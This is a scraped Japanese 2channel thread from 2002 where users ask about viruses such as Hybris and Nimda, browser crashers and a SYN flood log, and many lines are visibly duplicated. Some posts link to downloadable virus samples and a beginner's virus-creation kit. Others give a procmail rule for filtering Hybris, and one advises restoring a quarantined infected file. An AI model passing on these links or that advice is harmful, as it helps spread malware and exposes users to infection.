http://www.forum.or.jp/forum-tsushin/forum-tsushin-1.pdf
に [email protected] がある。
296 :検出名を教えてくださいませませ:02/02/05 18:37
検出名を教えてくださいませませ
ウイルス205種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。
ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
文化放送ではありません。
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf
http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=empire&alt=empire
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=FILESTRING.DA
初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml
ウイルス205種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。
ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
文化放送ではありません。
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf
http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=empire&alt=empire
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=FILESTRING.DA
初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml
297 :名無しさん@お腹いっぱい。:02/02/05 18:44
ウイルス→ヴァイラァスで統一運動
299 :名無しさん@お腹いっぱい。:02/02/06 00:15
メールタイトルなし・重要度高
Return-Path: <MAILER-DAEMON>
Received: from flora330 (pl171.nas511.yokosuka.nttpc.ne.jp [210.165.82.171])
添付ファイル PLBNKMPL.EXE ってのが来ましたがなんでしょうか。
Return-Path: <MAILER-DAEMON>
Received: from flora330 (pl171.nas511.yokosuka.nttpc.ne.jp [210.165.82.171])
添付ファイル PLBNKMPL.EXE ってのが来ましたがなんでしょうか。
300 :名無しさん@お腹いっぱい。:02/02/06 00:16
hybris
301 :名無しさん@お腹いっぱい。:02/02/06 00:16
>>299
Hybris
Hybris
302 :名無しさん@お腹いっぱい。:02/02/06 00:17
ありがとうございます。Outlookがスクリプト遮断しましたので
大丈夫だと思いますが・・・。
大丈夫だと思いますが・・・。
304 :Hybrisはスクリプト?:02/02/06 01:16
305 :名無しさん@Emacs:02/02/06 01:47
たったこれだけの情報でHybrisと断定できる方、
できればその根拠も教えていただきたく。
できればその根拠も教えていただきたく。
306 :名無しさん@お腹いっぱい。:02/02/06 01:50
>305
添付ファイル名
添付ファイル名
>305
8文字.exe
頭----尻
PL----PL←(同じ)
同じファイル名生成ルーチン組んだ別物出ればこの限りじゃないけど(w
8文字.exe
頭----尻
PL----PL←(同じ)
同じファイル名生成ルーチン組んだ別物出ればこの限りじゃないけど(w
308 :名無しさん@Emacs:02/02/06 02:42
[A-Z]{8}\.EXE なファイル名のウィルスはほかにもいっぱいあるんで
なんで断定できるんじゃ、と思っとったんだが、なるほど、
([A-Z]{2})[A-Z]{4}\1.EXE なのね。ありがと。
↑正規表現わからんと意味不明だな。
なんで断定できるんじゃ、と思っとったんだが、なるほど、
([A-Z]{2})[A-Z]{4}\1.EXE なのね。ありがと。
↑正規表現わからんと意味不明だな。
309 :名無しさん@お腹いっぱい。:02/02/06 02:43
メールタイトルなし、返信先アドレスなしモナー。
加えてメール本文なし、ファイルサイズ23k(28k?)なら確定。
加えてメール本文なし、ファイルサイズ23k(28k?)なら確定。
310 :名無しさん@お腹いっぱい。:02/02/06 02:48
Hybrisってかなり古いウィルスだけど、未だに流行ってるのが驚き
311 :名無しさん@お腹いっぱい。:02/02/06 02:58
:0:
* !^To:.*@
* Return-Path:.*<>
* Content-Type:.*multipart/mixed;.*boundary="--VE.*
ゴミ/.
拾いモン(w
* !^To:.*@
* Return-Path:.*<>
* Content-Type:.*multipart/mixed;.*boundary="--VE.*
ゴミ/.
拾いモン(w
312 :名無しさん@お腹いっぱい。:02/02/06 09:29
プラウザクラッシャーでしょうか?
sugoiってやつ踏んでしまってへこんでいます・・。
win検索でファイルが4個出てきて
削除しようとしたら、起動の方をクリックしてしまって
今度は名前が違ったように思えたのですが
sugoiはそのまま削除しましたが
違う名前でファイルにいるのでしょうか?
だれか知ってる方、教えてください!!
初心者なのでどうもすみませんです〜(泣
sugoiってやつ踏んでしまってへこんでいます・・。
win検索でファイルが4個出てきて
削除しようとしたら、起動の方をクリックしてしまって
今度は名前が違ったように思えたのですが
sugoiはそのまま削除しましたが
違う名前でファイルにいるのでしょうか?
だれか知ってる方、教えてください!!
初心者なのでどうもすみませんです〜(泣
313 : :02/02/06 10:00
>>312
あわてている気持ちは分かるが、もうちょっと状況を整理して
書き込まないと。
まず、ブラクラとウイルスは違うし。
あるURLをクリックしたら(下手に「踏んだら」なんて言葉を
使わない方がいいと思うよ。)、窓が次々と開いて
フリーズしたというような、現象を見たのか。
そうならブラクラ。
sugoiってやつ、といわれても。URLとか、どこにあったとかの
情報はないのか。
WIN検索とは何なのか。何を検索したら4個出てきたのか。
> 削除しようとしたら、起動の方をクリックしてしまって
はまだしも、
> 今度は名前が違ったように思えたのですが
> sugoiはそのまま削除しましたが
の二つの分の関連がよく分からない。
とりあえず、
初心者ですごくていねいに説明してもらわないと、というなら
PC初心者板をおすすめする。
それから、閲覧するだけで感染するウイルスなどを心配して
いるのなら、トレンドマイクロとか、シマンテックのサイトで
オンラインスキャンをお奨めする。
その後は、このどっちかのアンチウイルスソフトを購入して
入れておく方がいいかと思う。
あわてている気持ちは分かるが、もうちょっと状況を整理して
書き込まないと。
まず、ブラクラとウイルスは違うし。
あるURLをクリックしたら(下手に「踏んだら」なんて言葉を
使わない方がいいと思うよ。)、窓が次々と開いて
フリーズしたというような、現象を見たのか。
そうならブラクラ。
sugoiってやつ、といわれても。URLとか、どこにあったとかの
情報はないのか。
WIN検索とは何なのか。何を検索したら4個出てきたのか。
> 削除しようとしたら、起動の方をクリックしてしまって
はまだしも、
> 今度は名前が違ったように思えたのですが
> sugoiはそのまま削除しましたが
の二つの分の関連がよく分からない。
とりあえず、
初心者ですごくていねいに説明してもらわないと、というなら
PC初心者板をおすすめする。
それから、閲覧するだけで感染するウイルスなどを心配して
いるのなら、トレンドマイクロとか、シマンテックのサイトで
オンラインスキャンをお奨めする。
その後は、このどっちかのアンチウイルスソフトを購入して
入れておく方がいいかと思う。
314 :312です:02/02/06 10:49
>313
レスありがとうございます!!!
まだ混乱してるので分かりにくい書き込みですみません。
yahoo板の「ヤフオク最悪な出品者と最悪な落札者」95
htp://www1.harenet.ne.jp/~m-toyota/kiken/bc/sugoi.htm を
クリックしてしまいました。窓がつぎつぎと出てくるわ、pcはガゴガゴいうし、
パニクッてしまって窓を消すのに精一杯でした(汗。
その後、winスタートから
検索でファイルやフォルダの検索をし(sugoi で)
ファイルが4個表示されて、これを見た瞬間また混乱してしまい
削除をするはずがクリックして開けてしまったのです。
そしたらまたsugoiがウヨウヨ出てきて
そのとき出てきた物の名前が違ったように思えたのですが
sugoiが開くたびに名前が変るとかあるのでしょうか?(わかりにくくてすみません汗)
急いで消してしまったので名前すらわかりません。
まだpcの中に残っているのか不安でたまらないです。
今後、pcに影響があるのか心配で心配で・・
もう泣きっぱなしです・・今後は下手にクリックはしないようにします・・。
レスありがとうございます!!!
まだ混乱してるので分かりにくい書き込みですみません。
yahoo板の「ヤフオク最悪な出品者と最悪な落札者」95
htp://www1.harenet.ne.jp/~m-toyota/kiken/bc/sugoi.htm を
クリックしてしまいました。窓がつぎつぎと出てくるわ、pcはガゴガゴいうし、
パニクッてしまって窓を消すのに精一杯でした(汗。
その後、winスタートから
検索でファイルやフォルダの検索をし(sugoi で)
ファイルが4個表示されて、これを見た瞬間また混乱してしまい
削除をするはずがクリックして開けてしまったのです。
そしたらまたsugoiがウヨウヨ出てきて
そのとき出てきた物の名前が違ったように思えたのですが
sugoiが開くたびに名前が変るとかあるのでしょうか?(わかりにくくてすみません汗)
急いで消してしまったので名前すらわかりません。
まだpcの中に残っているのか不安でたまらないです。
今後、pcに影響があるのか心配で心配で・・
もう泣きっぱなしです・・今後は下手にクリックはしないようにします・・。
315 :名無しさん@お腹いっぱい。:02/02/06 12:20
スタートメニューから
アプリ起動しようとすると
しつこくFrontPageのインストーラが
でてくるんですけど
これってウイルスですか?
ウイルスバスターでは
何も検出されないんですけど、、
アプリ起動しようとすると
しつこくFrontPageのインストーラが
でてくるんですけど
これってウイルスですか?
ウイルスバスターでは
何も検出されないんですけど、、
316 :名無しさん@お腹いっぱい。:02/02/06 12:44
317 :名無しさん@お腹いっぱい。:02/02/06 13:12
>>315
多分インストール途中でやめたかなんかで、Officeインストーラが
ストーカー化している状態と思う。
Officeはいろいろと変なことするよ、経験上いうけど。
ただし、通常はOffice系のアプリを起動しようとしなければ
出てこないはずなので、スタートアップなどに何か入っているかも。
OSがないから分からないけど、システム情報のシステム設定ユーティリティか
コマンドのmsconfigとかで確認したほうがいいと思う。
そゆことで、こころあたりがあればビジネスソフト板のオフィス系のところか、
こころあたりがないなら、WIN板の該当するOSの質問スレあたりの方が
適当だと思うよ。
多分インストール途中でやめたかなんかで、Officeインストーラが
ストーカー化している状態と思う。
Officeはいろいろと変なことするよ、経験上いうけど。
ただし、通常はOffice系のアプリを起動しようとしなければ
出てこないはずなので、スタートアップなどに何か入っているかも。
OSがないから分からないけど、システム情報のシステム設定ユーティリティか
コマンドのmsconfigとかで確認したほうがいいと思う。
そゆことで、こころあたりがあればビジネスソフト板のオフィス系のところか、
こころあたりがないなら、WIN板の該当するOSの質問スレあたりの方が
適当だと思うよ。
318 :検出名を教えてくださいませませ:02/02/06 23:06
ウイルス205種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。
ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
文化放送ではありません。
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf
http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=empire&alt=empire
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=FILESTRING.DA
初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。
ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
文化放送ではありません。
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf
http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=empire&alt=empire
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=FILESTRING.DA
初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml
319 : :02/02/07 00:02
今日、やっと光ファイバーが開通しました。工事に結構手間取って、午後遅くに完了しました。
Bフレッツの10Mです。8MのADSLが通らないエリアだったこともありますが、新物好きなので、光ファイバーにしたのです。
5,000円+プロバイダー料金ですので、6〜7,000円位で、PCが5台まで接続できますので、考えようですが、ずいぶん安いと思います。
様子を見て、100M(9,000円)にしようかなと思いますが、PCとかルーターの性能が追いついていないので当分はこのままにしようと思います。
使ってみると掲示板が2秒ちょっとで表示されますので、快適です!ただ、ネットスケープ6.2は、途中でネゴシエーションが何回もストップして、遅いです。
旧バージョンのネットスケープ4.2の方が快適です。ということで、靴の前にPCが欲しくなってきました。
画面がXGAではちょっと狭いので、UXGAかSXGAのノートパソコンがいいかなと物色していたのですが、VAIOしかないですネ。
う〜ん、一番性能がいいタイプは30万円位ですので、買うには気合が必要です・・・。
靴を買うか、PCを買うか、本当に悩ましいです。30万円あると、日本でもウゴリーニなどのビスポークが2足できます。
フランスでなら、ウェストンのコンピューターオーダーが2足、ベルルッティのビスポークも1足できます。
比較の対象が、靴になってしまうところが、私らしいですネ(笑い)。いずれにしても、購買意欲は高まっています。
日本大不況の一般人への浸透の訪れを予感していながら、反省していません・・・。
Bフレッツの10Mです。8MのADSLが通らないエリアだったこともありますが、新物好きなので、光ファイバーにしたのです。
5,000円+プロバイダー料金ですので、6〜7,000円位で、PCが5台まで接続できますので、考えようですが、ずいぶん安いと思います。
様子を見て、100M(9,000円)にしようかなと思いますが、PCとかルーターの性能が追いついていないので当分はこのままにしようと思います。
使ってみると掲示板が2秒ちょっとで表示されますので、快適です!ただ、ネットスケープ6.2は、途中でネゴシエーションが何回もストップして、遅いです。
旧バージョンのネットスケープ4.2の方が快適です。ということで、靴の前にPCが欲しくなってきました。
画面がXGAではちょっと狭いので、UXGAかSXGAのノートパソコンがいいかなと物色していたのですが、VAIOしかないですネ。
う〜ん、一番性能がいいタイプは30万円位ですので、買うには気合が必要です・・・。
靴を買うか、PCを買うか、本当に悩ましいです。30万円あると、日本でもウゴリーニなどのビスポークが2足できます。
フランスでなら、ウェストンのコンピューターオーダーが2足、ベルルッティのビスポークも1足できます。
比較の対象が、靴になってしまうところが、私らしいですネ(笑い)。いずれにしても、購買意欲は高まっています。
日本大不況の一般人への浸透の訪れを予感していながら、反省していません・・・。
320 :名無しさん@お腹いっぱい。:02/02/07 00:04
>319
で?
で?
321 :仕様書無しさん:02/02/07 00:12
最近IISを構築したら頻繁にNimdaに感染するようになりました。
なんででしょう?どっかに穴があいてるんでしょうか?
なんででしょう?どっかに穴があいてるんでしょうか?
322 :cheshire-cat:02/02/07 00:15
>>321
IISを直接攻撃するのはパッチあてればいい。
どっかのHPを見て感染するのは、IE6入れればいい。
メル感染もパッチ入れればいい。
LAN感染は、OSが入っているフォルダを丸ごと共有にしなければいい。
結局ノートンかバスターでも入れとけばいい。
IISを直接攻撃するのはパッチあてればいい。
どっかのHPを見て感染するのは、IE6入れればいい。
メル感染もパッチ入れればいい。
LAN感染は、OSが入っているフォルダを丸ごと共有にしなければいい。
結局ノートンかバスターでも入れとけばいい。
323 :犬:02/02/07 00:20
http://www.securiteam.com/windowsntfocus/5QP08156AQ.html
[Virus Can Exploit Long Path under NTFS to Evade Detection]
↑これ、、、やばくない?(w
アッ、アッ・・・・アッ!・・奥まで入れちゃイヤ〜ン
[Virus Can Exploit Long Path under NTFS to Evade Detection]
↑これ、、、やばくない?(w
アッ、アッ・・・・アッ!・・奥まで入れちゃイヤ〜ン
324 :仕様書無しさん:02/02/07 00:27
>322
ありがたまきん。
ありがたまきん。
325 :cheshire-cat:02/02/07 00:33
327 :cheshire-cat:02/02/07 00:49
>>326
先日踏んだけどさ、それってジャバスクで変な別窓開くだけで、インストなんかされない。
悪質なジョークサイトみたいなもの。
「どこにインストールされるのか私もわかりません」なんて言葉で、余計に不安を煽っているだけ。
先日踏んだけどさ、それってジャバスクで変な別窓開くだけで、インストなんかされない。
悪質なジョークサイトみたいなもの。
「どこにインストールされるのか私もわかりません」なんて言葉で、余計に不安を煽っているだけ。
328 :名無しさん@お腹いっぱい。:02/02/07 00:49
>>326
インストールされてない
インストールされてない
329 :音痴:02/02/07 00:53
どーもこんにちは。
Startメニューをあけて、例えばプログラムの右側には「>」があるじゃないですか?
それが何故か、数字の8に変わってしまったのです。
あと、exploreの最小化のアイコンが数字の「0」に、最大化は1.閉じるもなんかわけわからない数学的記号になってます。
おまけに、internet exploreのツールバーの「←戻る」の横に6があります。
これってvirusなのでしょうか?すいません、教えてください。(無知なもので。。。)
もし設定で直せる場合も教えてください、おねがいします。
Startメニューをあけて、例えばプログラムの右側には「>」があるじゃないですか?
それが何故か、数字の8に変わってしまったのです。
あと、exploreの最小化のアイコンが数字の「0」に、最大化は1.閉じるもなんかわけわからない数学的記号になってます。
おまけに、internet exploreのツールバーの「←戻る」の横に6があります。
これってvirusなのでしょうか?すいません、教えてください。(無知なもので。。。)
もし設定で直せる場合も教えてください、おねがいします。
そうですか。なんか怖くなって書き込みましたです。
ありがとうです。
ありがとうです。
331 :名無しさん@お腹いっぱい。:02/02/07 01:04
>>329
書き間違ったスレ見ろ とっくに答えが出ている
書き間違ったスレ見ろ とっくに答えが出ている
332 :名無しさん@お腹いっぱい。:02/02/07 01:04
被った、スマソ>>331
334 :名無しさん@お腹いっぱい。:02/02/07 01:23
[email protected]が送られてきました。
各フォルダ内の全メールをまとめて1つのファイルに保存するタイプの
メーラーを使っているため、そのフォルダ内のメールはすべて読むことができない状態です。
ノートンのウイルススキャンで発見されたものの、ファイルの修復ができず
シマンテックにも[email protected]の詳しいコメントがありません。
ちなみにBadtrans.Bのときは感染しませんでした。
他のフォルダにも同じウイルスが送られてしまったら
また感染してしまうかもしれない…と考えると鬱です(;´Д`)
各フォルダ内の全メールをまとめて1つのファイルに保存するタイプの
メーラーを使っているため、そのフォルダ内のメールはすべて読むことができない状態です。
ノートンのウイルススキャンで発見されたものの、ファイルの修復ができず
シマンテックにも[email protected]の詳しいコメントがありません。
ちなみにBadtrans.Bのときは感染しませんでした。
他のフォルダにも同じウイルスが送られてしまったら
また感染してしまうかもしれない…と考えると鬱です(;´Д`)
あー、なんかちょっと変。
「ファイルの修復ができず、隔離されたままなので
そのフォルダ内のメールはすべて読むことができない状態です。」
に訂正です。
「ファイルの修復ができず、隔離されたままなので
そのフォルダ内のメールはすべて読むことができない状態です。」
に訂正です。
やっぱり変な文章だ。
逝ってきます…。
逝ってきます…。
337 :名無しさん@お腹いっぱい。:02/02/07 01:35
339 :名無しさん@お腹いっぱい。:02/02/07 02:56
えーと。使ってるメイラーにもよるし、のーとん君がどんなふうに
ファイルを隔離するのか忘れたんでアレだけど、
1. アンチウィルスソフトをいったん停止
2. 隔離されたウィルス入りファイルをもとあった場所にコピー
運がよければこれでもとどおりメールが読めるかもしれない。となると、
3. 感染しないよう気をつけてメイラーで該当メールだけ削除
4. アンチウィルスソフトを動かす
で、うまくいくかも。あくまでも「かも」なんで期待せぬよう。
ファイルを隔離するのか忘れたんでアレだけど、
1. アンチウィルスソフトをいったん停止
2. 隔離されたウィルス入りファイルをもとあった場所にコピー
運がよければこれでもとどおりメールが読めるかもしれない。となると、
3. 感染しないよう気をつけてメイラーで該当メールだけ削除
4. アンチウィルスソフトを動かす
で、うまくいくかも。あくまでも「かも」なんで期待せぬよう。
340 :検出名を教えてくださいませませ:02/02/07 03:03
ウイルス205種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。
ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
文化放送ではありません。
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf
http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=empire&alt=empire
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=FILESTRING.DA
初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。
ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
文化放送ではありません。
http://www.symantec.com/region/jp/sarcj/data/b/bloodhound.html
http://www.symantec.com/avcenter/reference/heuristc.pdf
http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=empire&alt=empire
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=FILESTRING.DA
初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml
>>339
私も気になって、該当メールを削除してから
それらしきことをやってみました。
(レス読む前だったのでノートンは停止しませんでしたが…)
「項目の復元」というのがあって、感染したファイルを元の場所に戻し
それからもう一度スキャンしてみました。
なぜかウイルスは発見されず…。
うまくいったのかな。。念のためオンラインスキャンもしました。
とりあえず一安心です。
レスありがとうございました。
私も気になって、該当メールを削除してから
それらしきことをやってみました。
(レス読む前だったのでノートンは停止しませんでしたが…)
「項目の復元」というのがあって、感染したファイルを元の場所に戻し
それからもう一度スキャンしてみました。
なぜかウイルスは発見されず…。
うまくいったのかな。。念のためオンラインスキャンもしました。
とりあえず一安心です。
レスありがとうございました。
>>317
遅レスすまそ
おっしゃるとおり、
以前、xpのSP1当てようとして
CDROM手元になくてやめてました。
あらためてSP1入れたら
なおりました。
でも、しばらくはなんともなかったのに
急におかしくなったんで
他にも何か原因あるのかなあ
遅レスすまそ
おっしゃるとおり、
以前、xpのSP1当てようとして
CDROM手元になくてやめてました。
あらためてSP1入れたら
なおりました。
でも、しばらくはなんともなかったのに
急におかしくなったんで
他にも何か原因あるのかなあ
オフィス系、特にMS Office はウィンドウズを自分の家だと思っているらしく、
おかしなタイミングで起動時に最適化をしたりとか、とにかくいろいろあるから。
エラーメッセージもあてにならないことが多いし。
オフィス系ソフトがらみは、たいがいビジネスソフトの方が情報あると思う。
じゃあ、まあウイルスでなくて良かったってことで。
おかしなタイミングで起動時に最適化をしたりとか、とにかくいろいろあるから。
エラーメッセージもあてにならないことが多いし。
オフィス系ソフトがらみは、たいがいビジネスソフトの方が情報あると思う。
じゃあ、まあウイルスでなくて良かったってことで。
345 :ウイルスのこと知りたい:02/02/07 20:13
有名な交換ソフトを介して流通していると言われるウイルス入りソフトを入手しました。
一つはW32.Whiter.Trojanが仕込まれていると掲載されたA***bat5J
一つはW32.Nimda.enc(dr)が仕込まれていると掲載された**革命 6.0 Virtual Pro
両ファイルともzip形式でしたので、解凍した後にウイルスバスター2002ビルド1217で
ドライブ全体をチェックしました。がしかし、ウイルスは検出されず。。。
上記2つのウイルスはソフトをセットアップした後でないとウイルスとして認識されない物なのでしょうか?
発症してしまっては厄介なことになると思いセットアップまではしてないのですが。。。
未知の物なので興味だけではなんともならず、是非ご教授願えればと思います。
一つはW32.Whiter.Trojanが仕込まれていると掲載されたA***bat5J
一つはW32.Nimda.enc(dr)が仕込まれていると掲載された**革命 6.0 Virtual Pro
両ファイルともzip形式でしたので、解凍した後にウイルスバスター2002ビルド1217で
ドライブ全体をチェックしました。がしかし、ウイルスは検出されず。。。
上記2つのウイルスはソフトをセットアップした後でないとウイルスとして認識されない物なのでしょうか?
発症してしまっては厄介なことになると思いセットアップまではしてないのですが。。。
未知の物なので興味だけではなんともならず、是非ご教授願えればと思います。
346 :名無しさん@お腹いっぱい。:02/02/07 20:16
掲載された、っていうのはファイルサイズまで確認したのか?
ウィルス入ってないワレもいっぱいあるぞ。つーか割れるな。
ウィルス入ってないワレもいっぱいあるぞ。つーか割れるな。
347 :ウイルスのこと知りたい:02/02/07 20:33
5Jに関してはサイズ不明、革命はサイズ一致した物でした
348 :名無しさん@お腹いっぱい。:02/02/07 21:28
さっき
lain underground てとこからメールが来ました。
なんかウイルスっぽいのですが、どうでしょうか。
lain underground てとこからメールが来ました。
なんかウイルスっぽいのですが、どうでしょうか。
349 :名無しさん@お腹いっぱい。:02/02/07 22:48
350 :345:02/02/08 00:14
>>349
そうでしたか。。。怖いもの見たさの興味本位半分、また敵を知ればむやみに
怖がるものでもないと思う考えから仕入れた物だったのですが
恐縮ではありますが、因みに海外サイトはどのあたりを見れば?
お教えて頂ければうれしいのですが
そうでしたか。。。怖いもの見たさの興味本位半分、また敵を知ればむやみに
怖がるものでもないと思う考えから仕入れた物だったのですが
恐縮ではありますが、因みに海外サイトはどのあたりを見れば?
お教えて頂ければうれしいのですが
351 :名無しさん@お腹いっぱい。:02/02/08 02:32
先日、あるURLを開いた為に、
動きは一定時間で女の人の顔がフルスクリーンに映し出されるようになりました。
おまけに、「きゃ〜」と叫びます。
表示時間は約1秒くらいで、出現割合はランダムです。
同じような経験がある人はいませんか?もしかしてウィルス?
かなり、キモイので対処方法を是非教えてください!!
本当に困っています…。
動きは一定時間で女の人の顔がフルスクリーンに映し出されるようになりました。
おまけに、「きゃ〜」と叫びます。
表示時間は約1秒くらいで、出現割合はランダムです。
同じような経験がある人はいませんか?もしかしてウィルス?
かなり、キモイので対処方法を是非教えてください!!
本当に困っています…。
352 :名無しさん@お腹いっぱい。:02/02/08 02:49
>351
「はぁぁああぁん!!」
・・・ってなまなましい声出すやつだったらよかったのにね。
「はぁぁああぁん!!」
・・・ってなまなましい声出すやつだったらよかったのにね。
353 :割れより「収監しりある」読め!:02/02/08 03:16
354 :名無しさん@お腹いっぱい。:02/02/10 01:23
メールでW32/Hllp Gopとか言うのが送られてきて
アンチウィルスソフトがアラート出したので削除したのですが
これはどんなウィルスでしょう?
Googleで検索しても出なかったので・・・。
アンチウィルスソフトがアラート出したので削除したのですが
これはどんなウィルスでしょう?
Googleで検索しても出なかったので・・・。
355 :名無しさん@お腹いっぱい。:02/02/10 01:26
356 :名無しさん@お腹いっぱい。:02/02/10 03:08
170 :夜勤 ★ :02/02/10 03:02 ID:???
2ちゃんねるはログを取っていた!
This is the attack I am refering to.. notice all the SYN_RECV messages.
These will hand waiting for an ACK or a FIN message. The source address of
these is random.
tcp 0 0 64.71.177.66:80 7.3.48.44:1984 SYN_RECV root
tcp 0 0 64.71.177.66:80 130.0.90.1:1972 SYN_RECV root
tcp 0 0 64.71.177.66:80 22.0.44.63:1506 SYN_RECV root
tcp 0 0 64.71.177.66:80 36.21.80.5:1695 SYN_RECV root
tcp 0 0 64.71.177.66:80 83.2.28.41:1606 SYN_RECV root
tcp 0 0 64.71.177.66:80 1.83.197.83:1220 SYN_RECV root
tcp 0 0 64.71.177.66:80 106.3.26.45:1411 SYN_RECV root
tcp 0 0 64.71.177.66:80 11.15.73.23:1770 SYN_RECV root
tcp 0 0 64.71.177.66:80 117.52.53.0:1283 SYN_RECV root
tcp 0 0 64.71.177.66:80 12.59.51.94:1401 SYN_RECV root
tcp 0 0 64.71.177.66:80 129.8.32.43:1474 SYN_RECV root
tcp 0 0 64.71.177.66:80 137.2.38.49:1914 SYN_RECV root
tcp 0 0 64.71.177.66:80 15.22.48.30:1867 SYN_RECV root
tcp 0 0 64.71.177.66:80 19.91.80.15:1124 SYN_RECV root
tcp 0 0 64.71.177.66:80 2.12.232.39:1191 SYN_RECV root
tcp 0 0 64.71.177.66:80 218.2.211.8:1460 SYN_RECV root
tcp 0 0 64.71.177.66:80 24.44.57.72:1438 SYN_RECV root
tcp 0 0 64.71.177.66:80 34.10.39.43:1160 SYN_RECV root
tcp 0 0 64.71.177.66:80 36.4.127.36:1993 SYN_RECV root
tcp 0 0 64.71.177.66:80 37.61.29.68:1927 SYN_RECV root
tcp 0 0 64.71.177.66:80 39.29.144.2:1075 SYN_RECV root
tcp 0 0 64.71.177.66:80 56.24.56.84:1931 SYN_RECV root
tcp 0 0 64.71.177.66:80 56.53.50.26:1288 SYN_RECV root
2ちゃんねるはログを取っていた!
This is the attack I am refering to.. notice all the SYN_RECV messages.
These will hand waiting for an ACK or a FIN message. The source address of
these is random.
tcp 0 0 64.71.177.66:80 7.3.48.44:1984 SYN_RECV root
tcp 0 0 64.71.177.66:80 130.0.90.1:1972 SYN_RECV root
tcp 0 0 64.71.177.66:80 22.0.44.63:1506 SYN_RECV root
tcp 0 0 64.71.177.66:80 36.21.80.5:1695 SYN_RECV root
tcp 0 0 64.71.177.66:80 83.2.28.41:1606 SYN_RECV root
tcp 0 0 64.71.177.66:80 1.83.197.83:1220 SYN_RECV root
tcp 0 0 64.71.177.66:80 106.3.26.45:1411 SYN_RECV root
tcp 0 0 64.71.177.66:80 11.15.73.23:1770 SYN_RECV root
tcp 0 0 64.71.177.66:80 117.52.53.0:1283 SYN_RECV root
tcp 0 0 64.71.177.66:80 12.59.51.94:1401 SYN_RECV root
tcp 0 0 64.71.177.66:80 129.8.32.43:1474 SYN_RECV root
tcp 0 0 64.71.177.66:80 137.2.38.49:1914 SYN_RECV root
tcp 0 0 64.71.177.66:80 15.22.48.30:1867 SYN_RECV root
tcp 0 0 64.71.177.66:80 19.91.80.15:1124 SYN_RECV root
tcp 0 0 64.71.177.66:80 2.12.232.39:1191 SYN_RECV root
tcp 0 0 64.71.177.66:80 218.2.211.8:1460 SYN_RECV root
tcp 0 0 64.71.177.66:80 24.44.57.72:1438 SYN_RECV root
tcp 0 0 64.71.177.66:80 34.10.39.43:1160 SYN_RECV root
tcp 0 0 64.71.177.66:80 36.4.127.36:1993 SYN_RECV root
tcp 0 0 64.71.177.66:80 37.61.29.68:1927 SYN_RECV root
tcp 0 0 64.71.177.66:80 39.29.144.2:1075 SYN_RECV root
tcp 0 0 64.71.177.66:80 56.24.56.84:1931 SYN_RECV root
tcp 0 0 64.71.177.66:80 56.53.50.26:1288 SYN_RECV root
357 :名無しさん@お腹いっぱい。:02/02/10 03:16
279 名前:夜勤 ★ :02/02/10 03:15 ID:???
まさしく SYN flood ですっていう意味ね
まさしく SYN flood ですっていう意味ね
http://www.ebcvg.com/files/binary/Empire.248.zip
のウイルスバスター2002での検出名を教えてください。
−−−−−
ウイルスバスター2002の未知のウイルスの検出名は?
−−−−−
ウイルス205種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。
ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
初心者向けウイルス作成ソフト
http://vx.netlux.org/dat/vct.shtml
のウイルスバスター2002での検出名を教えてください。
−−−−−
ウイルスバスター2002の未知のウイルスの検出名は?
−−−−−
ウイルス205種
http://www.ebcvg.com/binary.php
Empire248はBloodhoundFileString(左端の上から6番目)
未知のウイルス名称決定
このウイルス検出名はVCL_MUT.Empire.248となりました。
ほかのアンチウイルスソフトでの検出名を教えてくださいませませ。
初心者向けウイルス作成ソフト
